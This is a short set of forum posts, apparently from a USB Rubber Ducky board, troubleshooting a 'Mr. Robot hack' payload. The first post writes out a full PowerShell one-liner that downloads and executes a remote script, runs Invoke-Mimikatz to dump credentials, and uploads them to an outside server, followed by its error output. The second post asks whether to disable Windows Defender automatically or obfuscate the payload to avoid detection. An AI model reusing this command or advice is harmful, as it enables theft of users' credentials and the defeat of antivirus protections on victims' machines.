MS08067
Posts posted by MS08067
I am getting the following error. The web server does create the file; however, the contents are blank. Here is what is found when running the command. Anyone else run into this?
C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)"
New-Object :
Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:85
+ ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ...
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
C:\WINDOWS\system32>
Mr. Robot Hack (optimized payload)
in Classic USB Rubber Ducky
I figured out what's going on here. Windows Defender was catching it and removing it before it was able to be run. Once I disabled it, it then worked just fine. Now the question is, should we automate turning Windows Defender off as a service (since we are administrator) or do we try and obfuscate the file so it's not detected?